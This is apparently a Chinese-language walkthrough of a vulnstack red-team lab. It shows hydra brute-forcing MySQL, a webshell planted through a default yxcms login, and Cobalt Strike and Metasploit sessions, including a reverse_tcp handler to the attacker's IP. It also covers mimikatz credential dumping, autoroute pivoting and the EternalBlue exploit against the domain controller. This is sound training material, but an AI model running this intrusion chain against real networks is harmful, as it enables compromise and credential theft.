靶场搭建
下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
靶场环境
系统 | 配置 |
---|---|
win7 | 网络适配器(桥接)192.168.218.128和网络适配器2(nat)192.168.52.143 |
win03 | 网络适配器(桥接)192.168.52.141 |
win08 | 网络适配器(桥接)192.168.52.138 |
kali | 网络适配器(nat)192.168.218.129 |
外网拿权限
信息收集
使用kali扫描192.168.218.128(win7)也就是web服务器的IP地址
发现80和3306端口开启,那么访问80然后扫描目录和爆破3306账号密码
hydra -L /home/kali/dic_username_mysql.txt -P /home/kali/dic_password_mysql.txt 192.168.218.128 mysql
扫描到的目录:
/phpmyadmin
/l.php
/beifen.rar
/yxcms
/phpinfo.php
3306爆破结果:
login: root
password: root
getshell方式
phpmyadmin日志写shell
yxcms写shell
默认账号密码为admin/123456
默认后台地址:http://192.168.218.128/yxcms//index.php?r=admin
写shell的位置登陆后台 — 前台模板 — 管理模板文件 — index_index.php
由于这里没有返回文件的路径,但是我们下载上面的备份文件,来找到index_index.php然后连接蚁剑
这里是一个管理员的权限
提权方式
CS上线提权
cs上线生成exe文件
上传exe然后在蚁剑中执行
打开cs可以看到该机器已经上线了
查看IP信息
查看域信息
systeminfo查看系统信息
运行mimikatz获取明文的账号和密码
CS提权
已经提权成功,拿到了system
内网信息收集
域信息收集
DNS服务器名:god.org
域:owa.god.org
域控:owa(192.168.52.138)
域内的主机:owa、ROOT-TVI862UBEH、STU1
win7:192.168.52.143
内网横向移动
SMB Beacon
因为kali无法直接访问内网的地址,所以需要CS派生smb beacon,让内网的主机连接到win7上。
.
SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。
新建监听
增加会话
选择新生成的监听
cs反弹shell给msf
配置监听
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.218.129
msf5 exploit(multi/handler) > set lport 12345
msf5 exploit(multi/handler) > exploit
设置监听与msf相同,然后增加会话
配置静态路由
meterpreter > run get_local_subnets #查看网段/子网
meterpreter > run autoroute -s 192.168.52.0/24 #添加路由
meterpreter > run autoroute -p #查看路由
meterpreter > background #转入后台运行
探测IP和端口
msf6 exploit(multi/handler) > back #返回
msf6 > use auxiliary/scanner/netbios/nbname #设置模块
msf6 auxiliary(scanner/netbios/nbname) > set rhosts 192.168.52-255 #扫描IP
msf6 auxiliary(scanner/netbios/nbname) > run #执行
对扫描到的IP探测端口,发现开放445端口
域内存活IP:192.168.52.141和192.168.52.138
探测端口:use auxiliary/scanner/portscan/tcp
发现域内的两台机器都存在永恒之蓝
是否存在永恒之蓝:use auxiliary/scanner/smb/smb_ms17_010
永恒之蓝
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set payload windows/x64/meterpreter/bind_tcp
msf6 > set rhosts 192.168.52.138
msf6 > run
记录踩的坑
mysql无法远程访问:https://blog.csdn.net/qq_36358636/article/details/94673312